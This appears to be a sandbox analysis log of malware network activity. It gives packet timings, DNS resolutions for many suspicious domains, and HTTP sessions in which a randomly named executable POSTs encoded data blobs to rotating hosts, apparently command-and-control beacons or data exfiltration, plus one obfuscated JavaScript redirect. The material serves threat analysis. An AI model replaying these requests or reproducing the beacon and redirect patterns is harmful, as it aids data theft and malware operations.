                                                                                Dec 14, 2024 13:52:55.020905972 CET8050051172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:55.020976067 CET5005180192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:55.021411896 CET8050051172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:55.021495104 CET5005180192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:55.234499931 CET5005180192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:56.253855944 CET5005280192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:56.374768972 CET8050052172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:56.374950886 CET5005280192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:56.389866114 CET5005280192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:56.509886980 CET8050052172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:56.509943962 CET8050052172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:57.703147888 CET8050052172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:57.703166008 CET8050052172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:57.703181028 CET8050052172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:57.703236103 CET5005280192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:57.890809059 CET5005280192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:58.912405014 CET5005380192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:59.032423973 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:52:59.032521963 CET5005380192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:59.044490099 CET5005380192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:52:59.164346933 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:53:00.357136965 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:53:00.357352972 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:53:00.357395887 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:53:00.357433081 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:53:00.357479095 CET5005380192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:53:00.357573986 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:53:00.357609987 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:53:00.357645988 CET5005380192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:53:00.357646942 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:53:00.357687950 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:53:00.357805967 CET5005380192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:53:00.358001947 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:53:00.358040094 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:53:00.358374119 CET5005380192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:53:00.361609936 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:53:00.361968994 CET5005380192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:53:00.364458084 CET5005380192.168.2.5172.67.220.36
                                                                                Dec 14, 2024 13:53:00.484319925 CET8050053172.67.220.36192.168.2.5
                                                                                Dec 14, 2024 13:53:05.965297937 CET5005480192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:06.085382938 CET8050054162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:06.085531950 CET5005480192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:06.101859093 CET5005480192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:06.222222090 CET8050054162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:07.609519005 CET5005480192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:07.730220079 CET8050054162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:07.730307102 CET5005480192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:08.633867979 CET5005780192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:08.753827095 CET8050057162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:08.754116058 CET5005780192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:08.768383980 CET5005780192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:08.888506889 CET8050057162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:10.281537056 CET5005780192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:10.401767969 CET8050057162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:10.401870966 CET5005780192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:11.300442934 CET5005880192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:11.420564890 CET8050058162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:11.420651913 CET5005880192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:11.435384989 CET5005880192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:11.556296110 CET8050058162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:11.556329966 CET8050058162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:12.937669039 CET5005880192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:13.018359900 CET8050058162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:13.018394947 CET8050058162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:13.018412113 CET8050058162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:13.018532991 CET5005880192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:13.018532991 CET5005880192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:13.018532991 CET5005880192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:13.062555075 CET8050058162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:13.062669039 CET5005880192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:13.957036018 CET5005980192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:14.077804089 CET8050059162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:14.080085993 CET5005980192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:14.092714071 CET5005980192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:14.212802887 CET8050059162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:15.421649933 CET8050059162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:15.421708107 CET8050059162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:15.421750069 CET8050059162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:15.421803951 CET5005980192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:15.421843052 CET5005980192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:15.424978018 CET5005980192.168.2.5162.0.217.35
                                                                                Dec 14, 2024 13:53:15.544811964 CET8050059162.0.217.35192.168.2.5
                                                                                Dec 14, 2024 13:53:21.071619987 CET5006080192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:21.192873001 CET805006081.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:21.193037987 CET5006080192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:21.208895922 CET5006080192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:21.329447031 CET805006081.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:22.487040997 CET805006081.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:22.487066031 CET805006081.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:22.487121105 CET5006080192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:22.721930027 CET5006080192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:23.738409042 CET5006180192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:23.858171940 CET805006181.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:23.858305931 CET5006180192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:23.879235983 CET5006180192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:23.999423981 CET805006181.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:25.151479959 CET805006181.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:25.151505947 CET805006181.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:25.152050972 CET5006180192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:25.390845060 CET5006180192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:26.768907070 CET5006280192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:26.891758919 CET805006281.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:26.892473936 CET5006280192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:26.907990932 CET5006280192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:27.027950048 CET805006281.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:27.027981043 CET805006281.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:28.184179068 CET805006281.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:28.184218884 CET805006281.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:28.184283018 CET5006280192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:28.421974897 CET5006280192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:29.442137003 CET5006380192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:29.563308954 CET805006381.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:29.563500881 CET5006380192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:29.578210115 CET5006380192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:29.698788881 CET805006381.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:30.855499983 CET805006381.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:30.855622053 CET805006381.2.196.19192.168.2.5
                                                                                Dec 14, 2024 13:53:30.855901003 CET5006380192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:30.858270884 CET5006380192.168.2.581.2.196.19
                                                                                Dec 14, 2024 13:53:30.978265047 CET805006381.2.196.19192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 14, 2024 13:49:59.194586992 CET | 1.1.1.1 | 192.168.2.5 | 0x128d | No error (0) | www.7261ltajbc.bond | - | 154.12.28.184 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:50:16.918570042 CET | 1.1.1.1 | 192.168.2.5 | 0x66b9 | No error (0) | www.muasamgiare.click | dns.ladipage.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 14, 2024 13:50:16.918570042 CET | 1.1.1.1 | 192.168.2.5 | 0x66b9 | No error (0) | dns.ladipage.com | - | 13.228.81.39 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:50:16.918570042 CET | 1.1.1.1 | 192.168.2.5 | 0x66b9 | No error (0) | dns.ladipage.com | - | 54.179.173.60 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:50:16.918570042 CET | 1.1.1.1 | 192.168.2.5 | 0x66b9 | No error (0) | dns.ladipage.com | - | 18.139.62.226 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:50:31.966650963 CET | 1.1.1.1 | 192.168.2.5 | 0xf04 | No error (0) | www.kkpmoneysocial.top | - | 172.67.129.38 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:50:31.966650963 CET | 1.1.1.1 | 192.168.2.5 | 0xf04 | No error (0) | www.kkpmoneysocial.top | - | 104.21.1.106 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:50:47.173177958 CET | 1.1.1.1 | 192.168.2.5 | 0xdc37 | No error (0) | www.artkub.net | - | 185.42.14.166 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:51:02.949561119 CET | 1.1.1.1 | 192.168.2.5 | 0xd43d | No error (0) | www.happyjam.life | - | 209.74.77.107 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:51:18.409284115 CET | 1.1.1.1 | 192.168.2.5 | 0x965a | No error (0) | www.123hellodrive.shop | 123hellodrive.shop | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 14, 2024 13:51:18.409284115 CET | 1.1.1.1 | 192.168.2.5 | 0x965a | No error (0) | 123hellodrive.shop | - | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:51:33.920608997 CET | 1.1.1.1 | 192.168.2.5 | 0x52bc | No error (0) | www.zoomlive.live | - | 154.208.202.225 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:51:33.920681000 CET | 1.1.1.1 | 192.168.2.5 | 0x52bc | No error (0) | www.zoomlive.live | - | 154.208.202.225 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:51:50.328896999 CET | 1.1.1.1 | 192.168.2.5 | 0x62e9 | No error (0) | www.dietcoffee.online | - | 77.68.64.45 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:52:06.109617949 CET | 1.1.1.1 | 192.168.2.5 | 0xb008 | No error (0) | www.guacamask.online | - | 208.91.197.27 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:52:06.109637976 CET | 1.1.1.1 | 192.168.2.5 | 0xb008 | No error (0) | www.guacamask.online | - | 208.91.197.27 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:52:21.568890095 CET | 1.1.1.1 | 192.168.2.5 | 0x94ed | No error (0) | www.appsolucao.shop | appsolucao.shop | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 14, 2024 13:52:21.568890095 CET | 1.1.1.1 | 192.168.2.5 | 0x94ed | No error (0) | appsolucao.shop | - | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:52:36.147614002 CET | 1.1.1.1 | 192.168.2.5 | 0xf186 | No error (0) | www.aziziyeescortg.xyz | - | 104.21.77.71 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:52:36.147614002 CET | 1.1.1.1 | 192.168.2.5 | 0xf186 | No error (0) | www.aziziyeescortg.xyz | - | 172.67.205.93 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:52:50.891206980 CET | 1.1.1.1 | 192.168.2.5 | 0x5071 | No error (0) | www.supernutra01.online | - | 172.67.220.36 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:52:50.891206980 CET | 1.1.1.1 | 192.168.2.5 | 0x5071 | No error (0) | www.supernutra01.online | - | 104.21.24.198 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:53:05.961961985 CET | 1.1.1.1 | 192.168.2.5 | 0xf3d1 | No error (0) | www.54248711.xyz | 54248711.xyz | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 14, 2024 13:53:05.961961985 CET | 1.1.1.1 | 192.168.2.5 | 0xf3d1 | No error (0) | 54248711.xyz | - | 162.0.217.35 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:53:21.066670895 CET | 1.1.1.1 | 192.168.2.5 | 0x499d | No error (0) | www.bagatowcannabis.cloud | bagatowcannabis.cloud | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 14, 2024 13:53:21.066670895 CET | 1.1.1.1 | 192.168.2.5 | 0x499d | No error (0) | bagatowcannabis.cloud | - | 81.2.196.19 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49801 | 154.12.28.184 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:49:59.332856894 CET | 484 | OUT | GET /vt4e/?NVK8=VWo59DE7z/zpNvlQrGwQqnlKKikmhHzFU/awM9upW87Yx15oShf3plLjnAS2lxJKaRtg2RYIywQ4d8OifO+R6Wiy9G2ixVXSMqx2pS2jo8Wgf7OcwrfnpeCilt1Zi3OUog==&V6T=lB24KzN0lF-8 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.7261ltajbc.bond
Connection: close
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Dec 14, 2024 13:50:00.870424986 CET | 858 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Dec 2024 12:50:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Data Ascii: 299<script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?4aeef933dc234878d84d1123ae8eab9f"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script>...1--><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"KQ2cxFS69unN6J8D",ck:"KQ2cxFS69unN6J8D"})</script><script> var url = "https://lameo.nrkeiu.tdvgb.cn/123.html"; var _0x0 = ["\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x68\x72\x65\x66"]; setTimeout(function() { window[_0x0[0]][_0x0[1]] = url; }, 0);</script>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49843 | 13.228.81.39 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:50:17.064775944 CET | 752 | OUT | POST /bsye/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.muasamgiare.click
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 205
Connection: close
Origin: http://www.muasamgiare.click
Referer: http://www.muasamgiare.click/bsye/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Data Ascii: NVK8=rePw7mJPrrCCKWU/NzNIAjiAomjZ1sdKAEyIQXy5OCuvuY0obFFEaFmniza3pH9XroMH9WezYsXHtZcFVx+8cz8hO1qFmzAXla8tYdYhNsflpd5s6kBVq5hNxhRSEQc40lK6Jos8PwjefPBjNFxN34CM7H2xqmCK4lCiJ8L+FFIhKPLIwb3eIp3iJa5QJEKcRQkxkR8=
Dec 14, 2024 13:50:18.630604982 CET | 368 | IN | HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Sat, 14 Dec 2024 12:50:18 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
Location: https://www.muasamgiare.click/bsye/
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49849 | 13.228.81.39 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:50:19.732862949 CET | 772 | OUT | POST /bsye/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.muasamgiare.click
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 225
Connection: close
Origin: http://www.muasamgiare.click
Referer: http://www.muasamgiare.click/bsye/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Data Ascii: NVK8=rePw7mJPrrCCYmE/LSNIIjiPnGjZ/MdRAEOIQW2pO02vu5EoaEFEZFmnqTaynn9QroR49XyzYsrHtbUFVmq7OT8jHVrj7jAXla8tYdMHNsHlptJs7B1WmZhOnxRSAQc00lLvJpgCPyrefOxjMXZMiICKkX3gsUj7i3e5AsmgGVE8P56iq5/2bJbaZJxnY0r1Lz0B6Gr7MO0W1mYawDCE4qITjiWg
Dec 14, 2024 13:50:21.308003902 CET | 368 | IN | HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Sat, 14 Dec 2024 12:50:21 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
Location: https://www.muasamgiare.click/bsye/
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49859 | 13.228.81.39 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:50:22.392061949 CET | 1789 | OUT | POST /bsye/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.muasamgiare.click
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1241
Connection: close
Origin: http://www.muasamgiare.click
Referer: http://www.muasamgiare.click/bsye/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Data Ascii: NVK8=rePw7mJPrrCCYmE/LSNIIjiPnGjZ/MdRAEOIQW2pO0OvpPYocn9EYFmngzaznn8MroJ09XuJYpvHs+AFAjG7Xj8jYFr3mzAGlatFYdcHNsHlprFs8UBWgZhNxhReEQdr0heYJpkSPGfefuhjBCFM+YCInX34sUvgi3C9AuGGGWk8Of3C5L3cP5L7VqNhPzzLJAQwm3z+Etc62DUplC32t7cLzivsiQag+4Fx1nkezXruo5b238YZmBy4rqxfbOVt5j9MWd7/0/tvufL8yyJcnqvjS3zI5Tz6IiVfeLuiRygNbCAgM/7wj/tqJ16AYTmewzi0gdy7M4yLJ/kElIRo5Uvr002uOwZNIdXEJVk8NGyjp5/utGEfEJWkgGOpXFb+B5tgm/7CZb0b3/RIws2aR3Q1ljAHvdIau7YWBTb/Gjr4z3Nm00AtW1RHe9Is3mn/SYnSN2bybluoXSwtR7reLKtFWbJivn+/370V3o4mBsGVCKmQAxRpDegKjiNBW07niffet9SGynY4IZVcFiCYvQpPRFlxq0Z+5sIwaFZBPX3d+MmyorC6CsGM9CkNDxJnqYv4xPQP+zlSTXk0IOqx2IwVDsrpo3J/Q5xAdM6T4cfoko3RNLBcYObiUWiL5FhgnHMWI7MOLzfdMfUcwa0rkfURoE1woEv9Xf3/e5OGbbMezmvRIsppzGlju6I6vZpFlDa2wgQkMByR3fhmM//BNfXjH/0DfOdcI+tgZuHQxh+WKq3pabnoR+/+7R4GSdIXXOs3aPF+MC7Ygltws0v3BJ4OlrUI8nbfA7d5m+DdX/AC7ve4jBdq1Ky+tnUsasUVe7+G33rQ2/5962ivFHbwwxbLxbeB3FtGk9gQ1VSNZvN9S6dv74dGOSvw/nWz8KCQqolCwHVGKnLikD5CCBi9buYizozEFuaFWLNM64qkw67S/iSdLuVWT6Ti6d9pzAlrAO/V8TE7w5OuLAzgIjbtQOW2kqtSklcQwxQgVLAkpdz7B/8 [TRUNCATED]
Dec 14, 2024 13:50:24.187650919 CET | 368 | IN | HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Sat, 14 Dec 2024 12:50:23 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
Location: https://www.muasamgiare.click/bsye/
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49865 | 13.228.81.39 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:50:25.056581974 CET | 486 | OUT | GET /bsye/?NVK8=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2IMU8cGlDr+1A+pKQ3eOAfVunh78ZhwTBEsJdZkSwuIREwgA==&V6T=lB24KzN0lF-8 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.muasamgiare.click
Connection: close
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Dec 14, 2024 13:50:26.635133982 CET | 523 | IN | HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Sat, 14 Dec 2024 12:50:26 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
Location: https://www.muasamgiare.click/bsye/?NVK8=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2IMU8cGlDr+1A+pKQ3eOAfVunh78ZhwTBEsJdZkSwuIREwgA==&V6T=lB24KzN0lF-8
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49882 | 172.67.129.38 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 13:50:32.105751991 CET | 755 | OUT | POST /86am/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.kkpmoneysocial.top
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 205
Connection: close
Origin: http://www.kkpmoneysocial.top
Referer: http://www.kkpmoneysocial.top/86am/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Data Ascii: NVK8=6q6n6VLzU8esJBZmj0/EXgzsMKIFAPZNOa1yvYcOWBCPSE1Hf9TV2hOvTB0iwl4/hQI8biLNg+UVnUM0Fbjq/vaLrwUvSamsy+yHFy0e5oMUzY3f+OsZ17+LGXdHyWN8EmNbHQiFAGx41YYPTVknF8FzuRNd39nsKlfSDhZBKxd0Z4x0yu2PFyC3bEGb9GpEVLakCIg=
Timestamp: Dec 14, 2024 13:50:33.366174936 CET | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 200 OK
Date: Sat, 14 Dec 2024 12:50:33 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Set-Cookie: loclang=en; expires=Tue, 17-Dec-2024 12:50:33 GMT; Max-Age=259200; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PonFfTN3%2BYX1LKMjd1a0A0suiJBZuTu0ou9ZJGpmirpGAf6rUhx2DAB0zCsrQy%2B8EPPwAiOmK3V5oTLU%2B%2F1z519EMEEOBk9S6TZ4UJIyF00gSsgUkgAj4xc%2B0JKcuTwL8S6ZjI%2BPCJuT"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f1e51fc6a2ac35d-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1489&min_rtt=1489&rtt_var=744&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=755&delivery_rate=0&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Timestamp: Dec 14, 2024 13:50:33.366254091 CET | Bytes transferred: 791 | Direction: IN | Data: (gzip-compressed binary chunk)


Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49888 | Destination IP: 172.67.129.38 | Destination Port: 80 | PID: 6008 | Process: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
